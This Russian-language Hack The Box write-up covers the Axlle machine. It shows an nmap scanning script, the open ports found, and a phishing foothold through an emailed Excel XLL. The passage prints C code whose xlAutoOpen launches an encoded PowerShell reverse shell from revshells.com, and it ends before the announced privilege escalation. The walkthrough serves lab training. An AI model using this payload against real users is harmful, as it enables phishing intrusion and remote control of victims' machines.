В этой статье я покажу, как повысить при­виле­гии в Windows при помощи тех­ники LOLBins, на при­мере прог­раммы StandaloneRunner. Но преж­де мы получим сес­сию через фишинг с наг­рузкой XLL, а затем изме­ним кон­текст безопас­ности через под­мену фай­ла.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине Axlle с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.21 axlle.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел мно­жес­тво откры­тых пор­тов:

  • 80 (HTTP) — веб‑сер­вер Microsoft IIS/10.0;
  • 88 — Kerberos;
  • 135 — Microsoft RPC;
  • 139 — служ­ба сеан­сов NetBIOS, NetLogon;
  • 389 — LDAP;
  • 445 — SMB;
  • 464 — служ­ба сме­ны пароля Kerberos;
  • 593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;
  • 636 — LDAP с шиф­ровани­ем SSL или TLS;
  • 3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;
  • 3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;
  • 5985 — служ­ба уда­лен­ного управле­ния WinRM.

SMB ничего не воз­вра­щает, а что­бы попытать­ся вой­ти на поч­товый сер­вер, хорошо бы най­ти поч­ты. Так что для начала давай пос­мотрим на сайт.

Главная страница сайта
Глав­ная стра­ница сай­та
 

Точка опоры

На глав­ной стра­нице находим сооб­щение, что есть воз­можность отпра­вить файл в фор­мате Excel на адрес accounts@axlle.htb. Так­же в сооб­щении ука­зано, что выпол­нение мак­росов отклю­чено.

Страница сайта About
Стра­ница сай­та About

Хоть мак­росы и заб­локиро­ваны, Excel все рав­но поз­воля­ет выпол­нить код — при откры­тии спе­циаль­ной биб­лиоте­ки Excel DLL в фор­мате XLL. Напишем код такой биб­лиоте­ки, который будет запус­кать реверс‑шелл на PowerShell. Сге­нери­ровать его мож­но на сай­те revshells.com.

#include <windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
void __cdecl xlAutoOpen() {
WinExec("powershell -e JABjAGwA....ApAA==", 1);
}
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

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